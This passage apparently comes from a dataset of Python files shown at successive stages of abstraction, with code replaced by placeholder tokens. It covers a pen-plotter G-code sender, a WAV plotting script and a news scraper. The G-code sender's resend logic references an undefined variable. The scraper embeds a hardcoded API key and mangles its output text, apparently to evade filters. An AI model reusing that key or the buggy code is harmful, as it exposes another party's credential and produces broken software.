print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n 
self.parsing_thread.start()\n <function token>\n <function token>\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif 
response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n 
dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n 
elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n 
<function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n<class token>\n" ]
false
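A note on the GcodeSender record above: in `_read_and_process_and_wait_for_ok`, the resend branch calls `self._send_line(command)`, but `command` is never bound in that scope, so any firmware "rs"/"Resend" reply would raise a NameError instead of retransmitting. A minimal sketch of a fix, assuming the caller threads the last transmitted command through (the `last_command` parameter is an assumption, not part of the original class; only the resend branch is shown, the other branches stay as in the record):

def _read_and_process_and_wait_for_ok(self, last_command, break_on_timeout=False):
    response = self._read_line()
    if not response.strip() and break_on_timeout:
        return
    previous_line_number = self.line_number - 1
    while not response.startswith('ok'):
        if response.startswith((f'rs {previous_line_number}',
                                f'Resend:{previous_line_number}')):
            # Roll the counter back and retransmit the cached command;
            # the original referenced an undefined name `command` here.
            self.line_number -= 1
            self._send_line(last_command)
            response = self._read_line()
        else:
            # ... remaining branches unchanged from the record above ...
            response = self._read_line()

A caller such as `start_processing` (referenced by the record's `start` method) would then pass along the command it just sent, e.g. `self._read_and_process_and_wait_for_ok(command)`.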
49
c105f06e302740e9b7be100df905852bb5610a2c
import matplotlib matplotlib.use('TkAgg') import matplotlib.pyplot as plt import numpy as np import struct import wave scale = 0.01 wav = wave.open('output.wav', 'r') print 'channels %d'%wav.getnchannels() print 'smpl width %d'%wav.getsampwidth() print 'frame rate %f'%wav.getframerate() nframes = wav.getnframes() print 'frames %d'%nframes data = wav.readframes(nframes) data = scale * np.array(struct.unpack('<%dh'%nframes, data)) / float((1 << 14)) plt.plot(data) plt.show()
[ "import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport struct\nimport wave\n\nscale = 0.01\nwav = wave.open('output.wav', 'r')\n\nprint 'channels %d'%wav.getnchannels()\nprint 'smpl width %d'%wav.getsampwidth()\nprint 'frame rate %f'%wav.getframerate()\nnframes = wav.getnframes()\nprint 'frames %d'%nframes\n\ndata = wav.readframes(nframes)\n\ndata = scale * np.array(struct.unpack('<%dh'%nframes, data)) / float((1 << 14))\n\nplt.plot(data)\nplt.show()\n" ]
true
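Entry 49 is the only record in this stretch flagged `true`, presumably because its bare `print 'channels %d' % ...` statements are Python 2 syntax, so the file fails a Python 3 parse and no reduction steps exist beyond the raw source. A Python 3 port with identical logic (only the prints change) parses cleanly; it still assumes a mono 16-bit `output.wav` next to the script:

import struct
import wave

import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np

scale = 0.01
wav = wave.open('output.wav', 'r')

print('channels %d' % wav.getnchannels())
print('smpl width %d' % wav.getsampwidth())
print('frame rate %f' % wav.getframerate())
nframes = wav.getnframes()
print('frames %d' % nframes)

data = wav.readframes(nframes)
# Unpack little-endian signed 16-bit samples and scale down to roughly
# [-0.01, 0.01]; '<%dh' matches nframes samples, i.e. a single channel.
data = scale * np.array(struct.unpack('<%dh' % nframes, data)) / float(1 << 14)

plt.plot(data)
plt.show()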
50
e1d0648825695584d3ea518db961a9178ea0c66a
import requests import sxtwl import datetime from datetime import date import lxml from lxml import etree # 日历中文索引 ymc = [u"十一", u"十二", u"正", u"二", u"三", u"四", u"五", u"六", u"七", u"八", u"九", u"十"] rmc = [u"初一", u"初二", u"初三", u"初四", u"初五", u"初六", u"初七", u"初八", u"初九", u"初十", \ u"十一", u"十二", u"十三", u"十四", u"十五", u"十六", u"十七", u"十八", u"十九", \ u"二十", u"廿一", u"廿二", u"廿三", u"廿四", u"廿五", u"廿六", u"廿七", u"廿八", u"廿九", u"三十", u"卅一"] # 日历库实例化 lunar = sxtwl.Lunar() # 2.阳历转阴历 def china_lunar(): today = str(date.today()) today_list = today.split('-') # ['2019', '08', '08'] lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日 # 判断是否为润年 if (lunar_day.Lleap): china_day = "农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi]) else: china_day ="农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi]) return today,china_day import json def morning_news(): news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2' response = requests.get(news_api) print(dict(response.json())) news_list = dict(response.json()) news = '' m = 1 news_q='' for i in news_list['newslist']: img_url='' if i['url'] == '': img_url = i['imgsrc'] news = str(str(m)+":"+i['title']+"\n"+i['url']+img_url+"\n") news_q += str(news) m += 1 return news_q def news_put(): news_spider_message = '【早间新闻】 '+china_lunar()[0]+" "+china_lunar()[1]+"\n"+morning_news() return news_spider_message headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'} def NewYork_news(page=1): society = 'https://cn.nytimes.com/society/{}/'.format(page) response = requests.get(url=society,headers =headers ) mytree = lxml.etree.HTML(response.text) title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a') news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p') url = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href') # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题 # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介 # # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接 newss_1 = '' number = 1 for t in title: newss = str(number)+":"+str_list(t.text) +'。'+'\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\n'+' 详情:'+'\n'+'\n' newss_1 +=newss number += 1 return newss_1 def NewYork_news_put(page=0): news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+" "+china_lunar()[1]+"\n"+NewYork_news(page) return news_spider_message def str_list(t): m='' for i in list(t): if i == '中': china = 'Z' m += china +'_' else: m += i + '_' return m
[ "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\n# 日历中文索引\nymc = [u\"十一\", u\"十二\", u\"正\", u\"二\", u\"三\", u\"四\", u\"五\", u\"六\", u\"七\", u\"八\", u\"九\", u\"十\"]\nrmc = [u\"初一\", u\"初二\", u\"初三\", u\"初四\", u\"初五\", u\"初六\", u\"初七\", u\"初八\", u\"初九\", u\"初十\", \\\n u\"十一\", u\"十二\", u\"十三\", u\"十四\", u\"十五\", u\"十六\", u\"十七\", u\"十八\", u\"十九\", \\\n u\"二十\", u\"廿一\", u\"廿二\", u\"廿三\", u\"廿四\", u\"廿五\", u\"廿六\", u\"廿七\", u\"廿八\", u\"廿九\", u\"三十\", u\"卅一\"]\n\n# 日历库实例化\nlunar = sxtwl.Lunar()\n\n\n\n# 2.阳历转阴历\n\n\ndef china_lunar():\n today = str(date.today())\n\n today_list = today.split('-') # ['2019', '08', '08']\n lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日\n # 判断是否为润年\n if (lunar_day.Lleap):\n china_day = \"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day =\"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today,china_day\n\n\nimport json\ndef morning_news():\n news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q=''\n for i in news_list['newslist']:\n img_url=''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m)+\":\"+i['title']+\"\\n\"+i['url']+img_url+\"\\n\")\n news_q += str(news)\n m += 1\n\n return news_q\n\ndef news_put():\n news_spider_message = '【早间新闻】 '+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society,headers =headers )\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介\n #\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接\n newss_1 = ''\n number = 1\n for t in title:\n\n newss = str(number)+\":\"+str_list(t.text) +'。'+'\\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\\n'+' 详情:'+'\\n'+'\\n'\n newss_1 +=newss\n number += 1\n\n return newss_1\n\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+NewYork_news(page)\n\n return news_spider_message\n\ndef str_list(t):\n m=''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china +'_'\n else:\n\n m += i + '_'\n\n\n return m\n", "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef 
china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\nimport json\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<import token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = 
